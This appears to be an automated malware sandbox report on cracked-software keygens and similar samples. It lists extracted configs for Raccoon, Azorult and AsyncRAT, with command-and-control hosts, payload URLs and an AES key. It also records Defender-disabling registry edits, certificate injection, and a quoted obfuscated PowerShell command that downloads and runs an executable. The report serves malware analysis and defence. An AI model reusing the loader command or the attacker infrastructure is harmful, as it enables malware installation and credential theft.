Overview
overview
10Static
static
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
4ฺฺฺK...ฺฺ
windows10_x64
7ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
3Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1803s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 14:18
Static task
static1
Behavioral task
behavioral1
Sample
2019-09-02_22-41-10.bin.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
31.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3DMark 11 Advanced Edition.bin.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral6
Sample
DiskInternals_Uneraser_v5_keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
ForceOp 2.8.7 - By RaiSence.bin.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
HYDRA.bin.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
LtHv0O2KZDK4M637.bin.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
OnlineInstaller.bin.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral18
Sample
good.bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
infected dot net installer.bin.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
update.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
vir1.xls
Resource
win10v20201028
Behavioral task
behavioral22
Sample
xNet.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
VPN/VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
VPN/xNet.dll
Resource
win10v20201028
Behavioral task
behavioral26
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
General
Malware Config
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
raccoon
c6f4c67877b4427c759f396ca4c1dff4761d3cc9
-
url4cnc
https://telete.in/brikitiki
Extracted
azorult
http://195.245.112.115/index.php
Extracted
asyncrat
0.5.7B
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
AsyncMutex_6SI8OkPnk
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral9/memory/4836-228-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral9/memory/4836-230-0x000000000040616E-mapping.dmp disable_win_def behavioral9/memory/5036-233-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral9/memory/5036-234-0x0000000000403BEE-mapping.dmp disable_win_def behavioral9/files/0x000300000001ab9e-267.dat disable_win_def behavioral9/files/0x000300000001ab9e-266.dat disable_win_def behavioral9/memory/3880-735-0x000000000040616E-mapping.dmp disable_win_def behavioral9/memory/2640-747-0x0000000000403BEE-mapping.dmp disable_win_def behavioral9/files/0x000500000001abbd-788.dat disable_win_def behavioral9/files/0x000500000001abbd-787.dat disable_win_def -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Async RAT payload 3 IoCs
resource yara_rule behavioral9/memory/4604-218-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral9/memory/4604-219-0x000000000040C76E-mapping.dmp asyncrat behavioral9/memory/3928-719-0x000000000040C76E-mapping.dmp asyncrat -
ModiLoader First Stage 2 IoCs
resource yara_rule behavioral9/memory/2140-287-0x00000000005A0000-0x00000000005B0000-memory.dmp modiloader_stage1 behavioral9/memory/4404-695-0x0000000000690000-0x00000000006A0000-memory.dmp modiloader_stage1 -
Blocklisted process makes network request 6 IoCs
flow pid Process 21 3716 powershell.exe 22 4088 powershell.exe 25 3716 powershell.exe 26 4088 powershell.exe 27 4480 powershell.exe 29 4480 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 34 IoCs
pid Process 2840 Keygen.exe 5088 pnc.exe 5100 ldz.exe 3288 zVhjgfutyFD.exe 4468 HuytgfGDFwer.exe 4616 pnc.exe 2076 adv.exe 4636 zVhjgfutyFD.exe 4688 HuytgfGDFwer.exe 4188 xoEEhQ7GLT.exe 2140 Yms5gMrn3A.exe 4724 0X6NfiXLW1.exe 4684 Yk4BLKNa1Z.exe 4372 xoEEhQ7GLT.exe 4800 xoEEhQ7GLT.exe 4604 xoEEhQ7GLT.exe 4836 0X6NfiXLW1.exe 5036 Yk4BLKNa1Z.exe 696 s4drbjpj.exe 5740 axcjgfhwvvas.exe 5752 ldz.exe 5780 ldz.exe 5968 oscjgfhwvvas.exe 4600 axcjgfhwvvas.exe 1292 HXkNYAi4c4.exe 4404 v15Xka8Ssx.exe 6000 jkgBQhmV6k.exe 4784 AswoNvyLvJ.exe 3928 HXkNYAi4c4.exe 5172 jkgBQhmV6k.exe 5152 oscjgfhwvvas.exe 3880 jkgBQhmV6k.exe 2640 AswoNvyLvJ.exe 4432 tmnj3xnh.exe -
Loads dropped DLL 18 IoCs
pid Process 4688 HuytgfGDFwer.exe 4688 HuytgfGDFwer.exe 4688 HuytgfGDFwer.exe 4616 pnc.exe 4616 pnc.exe 4616 pnc.exe 4616 pnc.exe 4616 pnc.exe 4616 pnc.exe 5780 ldz.exe 5780 ldz.exe 5780 ldz.exe 5780 ldz.exe 5780 ldz.exe 5780 ldz.exe 5152 oscjgfhwvvas.exe 5152 oscjgfhwvvas.exe 5152 oscjgfhwvvas.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features Yk4BLKNa1Z.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Yk4BLKNa1Z.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" AswoNvyLvJ.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Klfn = "C:\\Users\\Admin\\AppData\\Local\\nflK.url" Yms5gMrn3A.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini pnc.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini ldz.exe -
Suspicious use of SetThreadContext 12 IoCs
description pid Process procid_target PID 5088 set thread context of 4616 5088 pnc.exe 104 PID 3288 set thread context of 4636 3288 zVhjgfutyFD.exe 106 PID 4468 set thread context of 4688 4468 HuytgfGDFwer.exe 107 PID 4188 set thread context of 4604 4188 xoEEhQ7GLT.exe 124 PID 4724 set thread context of 4836 4724 0X6NfiXLW1.exe 125 PID 4684 set thread context of 5036 4684 Yk4BLKNa1Z.exe 126 PID 5100 set thread context of 5780 5100 ldz.exe 165 PID 5740 set thread context of 4600 5740 axcjgfhwvvas.exe 169 PID 1292 set thread context of 3928 1292 HXkNYAi4c4.exe 186 PID 5968 set thread context of 5152 5968 oscjgfhwvvas.exe 187 PID 6000 set thread context of 3880 6000 jkgBQhmV6k.exe 189 PID 4784 set thread context of 2640 4784 AswoNvyLvJ.exe 191 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HuytgfGDFwer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString oscjgfhwvvas.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 2976 timeout.exe 3768 timeout.exe 4812 timeout.exe 2732 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4740 taskkill.exe 2788 taskkill.exe 5176 taskkill.exe 6032 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 1868 reg.exe 4760 reg.exe 1320 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Yms5gMrn3A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Yms5gMrn3A.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2192 powershell.exe 3716 powershell.exe 4088 powershell.exe 1268 powershell.exe 1268 powershell.exe 3716 powershell.exe 4088 powershell.exe 2192 powershell.exe 1268 powershell.exe 3716 powershell.exe 3716 powershell.exe 4088 powershell.exe 4088 powershell.exe 2192 powershell.exe 2192 powershell.exe 1268 powershell.exe 4480 powershell.exe 4480 powershell.exe 4704 powershell.exe 4704 powershell.exe 4480 powershell.exe 4704 powershell.exe 4480 powershell.exe 4704 powershell.exe 4188 xoEEhQ7GLT.exe 4188 xoEEhQ7GLT.exe 4188 xoEEhQ7GLT.exe 4188 xoEEhQ7GLT.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5088 pnc.exe 3288 zVhjgfutyFD.exe 4468 HuytgfGDFwer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 3716 powershell.exe Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 4740 taskkill.exe Token: SeDebugPrivilege 4188 xoEEhQ7GLT.exe Token: SeDebugPrivilege 4724 0X6NfiXLW1.exe Token: SeDebugPrivilege 4684 Yk4BLKNa1Z.exe Token: SeDebugPrivilege 4836 0X6NfiXLW1.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 2788 taskkill.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeIncreaseQuotaPrivilege 852 powershell.exe Token: SeSecurityPrivilege 852 powershell.exe Token: SeTakeOwnershipPrivilege 852 powershell.exe Token: SeLoadDriverPrivilege 852 powershell.exe Token: SeSystemProfilePrivilege 852 powershell.exe Token: SeSystemtimePrivilege 852 powershell.exe Token: SeProfSingleProcessPrivilege 852 powershell.exe Token: SeIncBasePriorityPrivilege 852 powershell.exe Token: SeCreatePagefilePrivilege 852 powershell.exe Token: SeBackupPrivilege 852 powershell.exe Token: SeRestorePrivilege 852 powershell.exe Token: SeShutdownPrivilege 852 powershell.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeSystemEnvironmentPrivilege 852 powershell.exe Token: SeRemoteShutdownPrivilege 852 powershell.exe Token: SeUndockPrivilege 852 powershell.exe Token: SeManageVolumePrivilege 852 powershell.exe Token: 33 852 powershell.exe Token: 34 852 powershell.exe Token: 35 852 powershell.exe Token: 36 852 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 612 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4456 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4248 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe Token: SeIncreaseQuotaPrivilege 2156 powershell.exe Token: SeSecurityPrivilege 2156 powershell.exe Token: SeTakeOwnershipPrivilege 2156 powershell.exe Token: SeLoadDriverPrivilege 2156 powershell.exe Token: SeSystemProfilePrivilege 2156 powershell.exe Token: SeSystemtimePrivilege 2156 powershell.exe Token: SeProfSingleProcessPrivilege 2156 powershell.exe Token: SeIncBasePriorityPrivilege 2156 powershell.exe Token: SeCreatePagefilePrivilege 2156 powershell.exe Token: SeBackupPrivilege 2156 powershell.exe Token: SeRestorePrivilege 2156 powershell.exe Token: SeShutdownPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeSystemEnvironmentPrivilege 2156 powershell.exe Token: SeRemoteShutdownPrivilege 2156 powershell.exe Token: SeUndockPrivilege 2156 powershell.exe Token: SeManageVolumePrivilege 2156 powershell.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 2840 Keygen.exe 5088 pnc.exe 3288 zVhjgfutyFD.exe 4468 HuytgfGDFwer.exe 2076 adv.exe 4836 0X6NfiXLW1.exe 4836 0X6NfiXLW1.exe 3880 jkgBQhmV6k.exe 3880 jkgBQhmV6k.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1152 wrote to memory of 2428 1152 Keygen.bin.exe 75 PID 1152 wrote to memory of 2428 1152 Keygen.bin.exe 75 PID 1152 wrote to memory of 2428 1152 Keygen.bin.exe 75 PID 2428 wrote to memory of 2840 2428 cmd.exe 79 PID 2428 wrote to memory of 2840 2428 cmd.exe 79 PID 2428 wrote to memory of 2840 2428 cmd.exe 79 PID 2428 wrote to memory of 3720 2428 cmd.exe 80 PID 2428 wrote to memory of 3720 2428 cmd.exe 80 PID 2428 wrote to memory of 3720 2428 cmd.exe 80 PID 2428 wrote to memory of 2116 2428 cmd.exe 81 PID 2428 wrote to memory of 2116 2428 cmd.exe 81 PID 2428 wrote to memory of 2116 2428 cmd.exe 81 PID 2428 wrote to memory of 2976 2428 cmd.exe 82 PID 2428 wrote to memory of 2976 2428 cmd.exe 82 PID 2428 wrote to memory of 2976 2428 cmd.exe 82 PID 3720 wrote to memory of 3716 3720 mshta.exe 83 PID 3720 wrote to memory of 3716 3720 mshta.exe 83 PID 3720 wrote to memory of 3716 3720 mshta.exe 83 PID 2116 wrote to memory of 2192 2116 mshta.exe 85 PID 2116 wrote to memory of 2192 2116 mshta.exe 85 PID 2116 wrote to memory of 2192 2116 mshta.exe 85 PID 2428 wrote to memory of 416 2428 cmd.exe 87 PID 2428 wrote to memory of 416 2428 cmd.exe 87 PID 2428 wrote to memory of 416 2428 cmd.exe 87 PID 2428 wrote to memory of 3780 2428 cmd.exe 88 PID 2428 wrote to memory of 3780 2428 cmd.exe 88 PID 2428 wrote to memory of 3780 2428 cmd.exe 88 PID 2428 wrote to memory of 3768 2428 cmd.exe 89 PID 2428 wrote to memory of 3768 2428 cmd.exe 89 PID 2428 wrote to memory of 3768 2428 cmd.exe 89 PID 416 wrote to memory of 4088 416 mshta.exe 90 PID 416 wrote to memory of 4088 416 mshta.exe 90 PID 416 wrote to memory of 4088 416 mshta.exe 90 PID 3780 wrote to memory of 1268 3780 mshta.exe 92 PID 3780 wrote to memory of 1268 3780 mshta.exe 92 PID 3780 wrote to memory of 1268 3780 mshta.exe 92 PID 2428 wrote to memory of 4392 2428 cmd.exe 94 PID 2428 wrote to memory of 4392 2428 cmd.exe 94 PID 2428 wrote to memory of 4392 2428 cmd.exe 94 PID 4392 wrote to memory of 4480 4392 mshta.exe 95 PID 4392 wrote to memory of 4480 4392 mshta.exe 95 PID 4392 wrote to memory of 4480 4392 mshta.exe 95 PID 2428 wrote to memory of 4596 2428 cmd.exe 97 PID 2428 wrote to memory of 4596 2428 cmd.exe 97 PID 2428 wrote to memory of 4596 2428 cmd.exe 97 PID 4596 wrote to memory of 4704 4596 mshta.exe 98 PID 4596 wrote to memory of 4704 4596 mshta.exe 98 PID 4596 wrote to memory of 4704 4596 mshta.exe 98 PID 3716 wrote to memory of 5088 3716 powershell.exe 100 PID 3716 wrote to memory of 5088 3716 powershell.exe 100 PID 3716 wrote to memory of 5088 3716 powershell.exe 100 PID 4088 wrote to memory of 5100 4088 powershell.exe 101 PID 4088 wrote to memory of 5100 4088 powershell.exe 101 PID 4088 wrote to memory of 5100 4088 powershell.exe 101 PID 5088 wrote to memory of 3288 5088 pnc.exe 102 PID 5088 wrote to memory of 3288 5088 pnc.exe 102 PID 5088 wrote to memory of 3288 5088 pnc.exe 102 PID 5088 wrote to memory of 4468 5088 pnc.exe 103 PID 5088 wrote to memory of 4468 5088 pnc.exe 103 PID 5088 wrote to memory of 4468 5088 pnc.exe 103 PID 5088 wrote to memory of 4616 5088 pnc.exe 104 PID 5088 wrote to memory of 4616 5088 pnc.exe 104 PID 5088 wrote to memory of 4616 5088 pnc.exe 104 PID 5088 wrote to memory of 4616 5088 pnc.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\797B.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Users\Admin\AppData\Local\Temp\797B.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2840
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Users\Public\pnc.exe"C:\Users\Public\pnc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3288 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4688 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4688 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\468043462435068\\* & exit8⤵PID:1124
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 46889⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
-
-
-
C:\Users\Public\pnc.exe"C:\Users\Public\pnc.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188 -
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
